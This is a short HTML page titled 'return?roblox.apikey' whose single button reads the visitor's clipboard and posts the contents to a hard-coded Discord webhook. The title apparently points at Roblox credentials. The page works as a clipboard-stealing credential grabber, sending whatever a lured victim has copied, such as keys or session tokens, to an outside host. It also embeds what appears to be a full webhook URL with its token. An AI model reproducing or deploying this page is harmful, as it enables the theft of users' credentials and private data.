<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>return?roblox.apikey</title>
</head>
<body>
    <button onclick="sendClipboardToWebhook()">Send Clipboard Content to Webhook</button>

    <script>
        async function sendClipboardToWebhook() {
            try {
                const text = await navigator.clipboard.readText();
                console.log("Clipboard content:", text);
                const webhookURL = 'https://discord.com/api/webhooks/1279895707355975772/VFofzG-3AgvFoiiOhPPUKDgIov6noi7_HBfVwnKEAiCNo1TwDjvKxVkI6sFwFTolb81H';
                const message = {
                    content: text,
                };
                const response = await fetch(webhookURL, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(message)
                });

                if (response.ok) {
                    console.log("Message sent successfully!");
                } else {
                    console.error("Failed to send message:", response.statusText);
                }
            } catch (error) {
                console.error("Error:", error);
            }
        }
    </script>
</body>
</html>
